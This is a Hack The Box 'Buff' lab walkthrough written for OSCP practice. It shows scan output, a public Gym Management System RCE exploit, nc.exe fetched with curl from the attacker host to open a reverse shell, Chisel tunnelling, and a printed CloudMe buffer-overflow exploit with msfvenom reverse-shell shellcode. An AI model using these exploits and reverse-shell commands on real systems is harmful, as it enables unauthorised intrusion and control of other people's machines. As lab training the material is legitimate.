In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Nmap scan
# Nmap 7.94 scan initiated Mon Oct 23 09:58:25 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/buff/results/10.10.10.198/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/buff/results/10.10.10.198/scans/xml/_quick_tcp_nmap.xml 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up, received user-set (0.41s latency).
Scanned at 2023-10-23 09:58:32 EDT for 55s
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
8080/tcp open http syn-ack Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: mrb3n's Bro Hut
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 23 09:59:27 2023 -- 1 IP address (1 host up) scanned in 62.21 seconds
nikto output
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.10.198
+ Target Hostname: 10.10.10.198
+ Target Port: 8080
+ Start Time: 2023-10-23 09:59:31 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
+ /: Retrieved x-powered-by header: PHP/7.4.6.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ OpenSSL/1.1.1g appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ PHP/7.4.6 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ Apache/2.4.43 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /icons/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /README.md: Readme Found.
+ 9169 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2023-10-23 11:12:28 (GMT-4) (4377 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
On the contact page we see that its created by Gym Management System 1.0
Doing a searchsploit
╭─kali@kali ~/HTB/buff
╰─$ searchsploit Gym Management system
-------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py
-------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
╭─kali@kali ~/HTB/buff
get the exploit
Shellcodes: No Results
╭─kali@kali ~/HTB/buff
╰─$ searchsploit -m php/webapps/48506.py
Exploit: Gym Management System 1.0 - Unauthenticated Remote Code Execution
URL: https://www.exploit-db.com/exploits/48506
Path: /usr/share/exploitdb/exploits/php/webapps/48506.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/HTB/buff/48506.py
╭─kali@kali ~/HTB/buff
╰─$
we get a shell straight away
Exiting.
╭─kali@kali ~/HTB/buff
╰─$ python2.7 ./48506.py http://10.10.10.198:8080/ 255 ↵
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload>
whoami
C:\xampp\htdocs\gym\upload> whoami
�PNG
�
buff\shaun
C:\xampp\htdocs\gym\upload> whoami /all
�PNG
�
USER INFORMATION
----------------
User Name SID
========== ==============================================
buff\shaun S-1-5-21-2277156429-3381729605-2640630771-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\xampp\htdocs\gym\upload>
sysinfo
C:\xampp\htdocs\gym\upload> systeminfo
�PNG
�
Host Name: BUFF
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.17134 N/A Build 17134
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: shaun
Registered Organization:
Product ID: 00329-10280-00000-AA218
Original Install Date: 16/06/2020, 15:05:58
System Boot Time: 23/10/2023, 13:35:36
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 07/08/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,650 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,896 MB
Virtual Memory: In Use: 1,903 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.198
[02]: fe80::58ce:bbdf:be3e:33f4
[03]: dead:beef::5501:3e4a:11:be9c
[04]: dead:beef::58ce:bbdf:be3e:33f4
[05]: dead:beef::ee
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
C:\xampp\htdocs\gym\upload>
we check the sysinfo
╭─kali@kali ~/HTB/buff/Windows-Exploit-Suggester ‹master●›
╰─$ python2.7 ./windows-exploit-suggester.py --database 2023-10-18-mssb.xls --systeminfo sys.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 160 potential bulletins(s) with a database of 137 known exploits
[*] there are now 160 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 10 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
....
we get the file and run it and get a better shell
C:\xampp\htdocs\gym\upload> curl http://10.10.14.4:90/nc.exe nc.exe
�PNG
�
MZ����@��� �!�L�!This program cannot be run in DOS mode.
$PEd���sN�/
f,
@9� �0��
C:\xampp\htdocs\gym\upload> curl http://10.10.14.4:90/nc.exe -o nc.exe
�PNG
�
C:\xampp\htdocs\gym\upload> nc.exe 10.10.14.4 443 -e cmd.exe
╭─kali@kali ~/HTB/buff
╰─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.198] 51035
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\gym\upload>cd ../
cd ../
C:\xampp\htdocs\gym>
check process that are running internally
C:\xampp\htdocs\gym\upload>netstat -ano | findstr 127.0.0.1
netstat -ano | findstr 127.0.0.1
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8832
UDP 127.0.0.1:1900 *:* 5420
UDP 127.0.0.1:56351 *:* 5420
UDP 127.0.0.1:58842 *:* 3000
C:\xampp\htdocs\gym\upload>
to connect to this we can do via port fowarding with chisel
add this to proxychains
GNU nano 7.2 /etc/proxychains.conf
#socks5 127.0.0.1 9050
socks5 127.0.0.1 1080
On kali machine
╭─kali@kali ~/HTB/buff
╰─$ sudo ./chisel_1.9.1_linux_amd64 server -p 8000 --reverse
2023/10/25 01:10:24 server: Reverse tunnelling enabled
2023/10/25 01:10:24 server: Fingerprint uItK4jDKzhzI3g3OpCI74twX3IzAJFdlcyt2RghqELk=
2023/10/25 01:10:24 server: Listening on http://0.0.0.0:8000
on windows client
C:\xampp\htdocs\gym\upload>.\chisel_1.9.1_windows_amd64 client 10.10.14.4:8000 R:3306:localhost:3306
.\chisel_1.9.1_windows_amd64 client 10.10.14.4:8000 R:3306:localhost:3306
https://medium.com/@n3nu/how-to-pivot-using-chisel-e59b1987e252
Try to get username and passoword to connect to the sql
C:\xampp\htdocs\gym>cd include
cd include
C:\xampp\htdocs\gym\include>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\xampp\htdocs\gym\include
16/06/2020 18:50 <DIR> .
16/06/2020 18:50 <DIR> ..
16/06/2020 16:31 134 db_connect.php
16/06/2020 16:31 6,700 functions.php
16/06/2020 16:31 453 logout.php
16/06/2020 16:31 595 process_login.php
16/06/2020 16:31 412 psl-config.php
16/06/2020 16:31 2,997 register.inc.php
6 File(s) 11,291 bytes
2 Dir(s) 8,493,277,184 bytes free
C:\xampp\htdocs\gym\include>type db_connect.php
type db_connect.php
<?php
include_once 'psl-config.php'; // As functions.php is not included
$mysqli = new mysqli("localhost", "root", "", "table");
?>
C:\xampp\htdocs\gym\include>
We see root and empty password. we can try ths
╭─kali@kali /usr/share/doc/python3-impacket/examples
╰─$ proxychains mysql -u root -h 10.10.14.4 -P 3306
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.14.4:3306 ... OK
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 19
Server version: 10.4.11-MariaDB mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
Looking at the database but nothing
─kali@kali /usr/share/doc/python3-impacket/examples
╰─$ proxychains mysql -u root -h 10.10.14.4 -P 3306
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.14.4:3306 ... OK
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 19
Server version: 10.4.11-MariaDB mariadb.org binary distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> SELECT name, type_desc FROM sys.server_principals WHERE type IN ('U', 'G', 'S');
ERROR 1146 (42S02): Table 'sys.server_principals' doesn't exist
MariaDB [(none)]> SELECT name FROM sys.databases;
ERROR 1146 (42S02): Table 'sys.databases' doesn't exist
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| phpmyadmin |
| table |
| test |
+--------------------+
6 rows in set (1.195 sec)
MariaDB [(none)]>
MariaDB [(none)]> USE mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mysql]>
MariaDB [mysql]> SELECT user, host, password FROM user;
+------+-----------+----------+
| User | Host | Password |
+------+-----------+----------+
| root | localhost | |
| root | 127.0.0.1 | |
| root | ::1 | |
| pma | localhost | |
+------+-----------+----------+
4 rows in set (1.226 sec)
MariaDB [mysql]> use table;
Database changed
MariaDB [table]> SELECT user, host, password FROM user;
ERROR 1146 (42S02): Table 'table.user' doesn't exist
MariaDB [table]> show TABLES;
Empty set (1.199 sec)
MariaDB [table]> use test
Database changed
MariaDB [test]> show TABLES;
Empty set (1.118 sec)
MariaDB [test]> use phpmyadmin;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [phpmyadmin]> show TABLES;
+------------------------+
| Tables_in_phpmyadmin |
+------------------------+
| pma__bookmark |
| pma__central_columns |
| pma__column_info |
| pma__designer_settings |
| pma__export_templates |
| pma__favorite |
| pma__history |
| pma__navigationhiding |
| pma__pdf_pages |
| pma__recent |
| pma__relation |
| pma__savedsearches |
| pma__table_coords |
| pma__table_info |
| pma__table_uiprefs |
| pma__tracking |
| pma__userconfig |
| pma__usergroups |
| pma__users |
+------------------------+
19 rows in set (1.026 sec)
MariaDB [phpmyadmin]> SELECT * FROM pma__users;
Empty set (1.025 sec)
MariaDB [phpmyadmin]>
after a while we see that port 8888 is also listening
C:\xampp\htdocs\gym\include>netstat -ano | findstr 127.0.0.1
netstat -ano | findstr 127.0.0.1
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8536
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 3560
TCP 127.0.0.1:49723 127.0.0.1:3306 TIME_WAIT 0
UDP 127.0.0.1:1900 *:* 5632
UDP 127.0.0.1:55800 *:* 5632
UDP 127.0.0.1:58805 *:* 3024
we do a new port fowarding to this
C:\xampp\htdocs\gym\upload>.\chisel_1.9.1_windows_amd64 client 10.10.14.4:8000 R:8888:localhost:8888
.\chisel_1.9.1_windows_amd64 client 10.10.14.4:8000 R:8888:localhost:8888
2023/10/25 11:01:38 client: Connecting to ws://10.10.14.4:8000
2023/10/25 11:01:41 client: Connected (Latency 339.7797ms)
in the downloads folder there is an exe called cloudme_1112.exe
C:\Users\shaun\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users\shaun\Downloads
14/07/2020 13:27 <DIR> .
14/07/2020 13:27 <DIR> ..
16/06/2020 16:26 17,830,824 CloudMe_1112.exe
1 File(s) 17,830,824 bytes
2 Dir(s) 9,812,205,568 bytes free
C:\Users\shaun\Downloads>
exploit on exploitdb –>https://www.exploit-db.com/exploits/48389
on searchsploit
─$ searchsploit CloudMe 127 ↵
------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR) | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py
------------------------------------------------------------------------- ---------------------------------
e/doc/python3-impacket/examples
╰─$ cd ~/HTB/buff
╭─kali@kali ~/HTB/buff
╰─$ searchsploit -m windows/remote/48389.py
Exploit: CloudMe 1.11.2 - Buffer Overflow (PoC)
URL: https://www.exploit-db.com/exploits/48389
Path: /usr/share/exploitdb/exploits/windows/remote/48389.py
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/HTB/buff/48389.py
╭─kali@kali ~/HTB/buff
╰─$ nano 48389.py
╭─kali@kali ~/HTB/buff
╰─$
create a shell to modify the payload shown in the script
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload
╰─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 -a x86 --platform windows LPORT=4444 EXITFUNC=thread -b '\x00\x0A\x0D' -f python > payload.py
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1745 bytes
╭─kali@kali ~/HTB/buff
╰─$ cat payload.py
buf = b""
buf += b"\xdb\xdf\xbf\xb7\xad\xa1\xe7\xd9\x74\x24\xf4\x5b"
buf += b"\x33\xc9\xb1\x52\x31\x7b\x17\x83\xc3\x04\x03\xcc"
buf += b"\xbe\x43\x12\xce\x29\x01\xdd\x2e\xaa\x66\x57\xcb"
buf += b"\x9b\xa6\x03\x98\x8c\x16\x47\xcc\x20\xdc\x05\xe4"
buf += b"\xb3\x90\x81\x0b\x73\x1e\xf4\x22\x84\x33\xc4\x25"
buf += b"\x06\x4e\x19\x85\x37\x81\x6c\xc4\x70\xfc\x9d\x94"
buf += b"\x29\x8a\x30\x08\x5d\xc6\x88\xa3\x2d\xc6\x88\x50"
buf += b"\xe5\xe9\xb9\xc7\x7d\xb0\x19\xe6\x52\xc8\x13\xf0"
buf += b"\xb7\xf5\xea\x8b\x0c\x81\xec\x5d\x5d\x6a\x42\xa0"
buf += b"\x51\x99\x9a\xe5\x56\x42\xe9\x1f\xa5\xff\xea\xe4"
buf += b"\xd7\xdb\x7f\xfe\x70\xaf\xd8\xda\x81\x7c\xbe\xa9"
buf += b"\x8e\xc9\xb4\xf5\x92\xcc\x19\x8e\xaf\x45\x9c\x40"
buf += b"\x26\x1d\xbb\x44\x62\xc5\xa2\xdd\xce\xa8\xdb\x3d"
buf += b"\xb1\x15\x7e\x36\x5c\x41\xf3\x15\x09\xa6\x3e\xa5"
buf += b"\xc9\xa0\x49\xd6\xfb\x6f\xe2\x70\xb0\xf8\x2c\x87"
buf += b"\xb7\xd2\x89\x17\x46\xdd\xe9\x3e\x8d\x89\xb9\x28"
buf += b"\x24\xb2\x51\xa8\xc9\x67\xf5\xf8\x65\xd8\xb6\xa8"
buf += b"\xc5\x88\x5e\xa2\xc9\xf7\x7f\xcd\x03\x90\xea\x34"
buf += b"\xc4\x95\xe0\x38\x10\xc2\xf6\x44\x09\x4e\x7e\xa2"
buf += b"\x43\x7e\xd6\x7d\xfc\xe7\x73\xf5\x9d\xe8\xa9\x70"
buf += b"\x9d\x63\x5e\x85\x50\x84\x2b\x95\x05\x64\x66\xc7"
buf += b"\x80\x7b\x5c\x6f\x4e\xe9\x3b\x6f\x19\x12\x94\x38"
buf += b"\x4e\xe4\xed\xac\x62\x5f\x44\xd2\x7e\x39\xaf\x56"
buf += b"\xa5\xfa\x2e\x57\x28\x46\x15\x47\xf4\x47\x11\x33"
buf += b"\xa8\x11\xcf\xed\x0e\xc8\xa1\x47\xd9\xa7\x6b\x0f"
buf += b"\x9c\x8b\xab\x49\xa1\xc1\x5d\xb5\x10\xbc\x1b\xca"
buf += b"\x9d\x28\xac\xb3\xc3\xc8\x53\x6e\x40\xe8\xb1\xba"
buf += b"\xbd\x81\x6f\x2f\x7c\xcc\x8f\x9a\x43\xe9\x13\x2e"
buf += b"\x3c\x0e\x0b\x5b\x39\x4a\x8b\xb0\x33\xc3\x7e\xb6"
buf += b"\xe0\xe4\xaa"
╭─kali@kali ~/HTB/buff
we replace the payload on the exploit with this
╭─kali@kali ~/HTB/buff
╰─$ python2.7 48389.py
we get a shell
╭─kali@kali ~/HTB/buff
╰─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.198] 49742
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator
C:\Windows\system32>cd ../
cd ../
C:\Windows>cd ../
cd ../
C:\>cd users
cd users
C:\Users>cd administrator
cd administrator
C:\Users\Administrator>cd desktop
cd desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
de8696af583cd283e900906f518680d0
C:\Users\Administrator\Desktop>se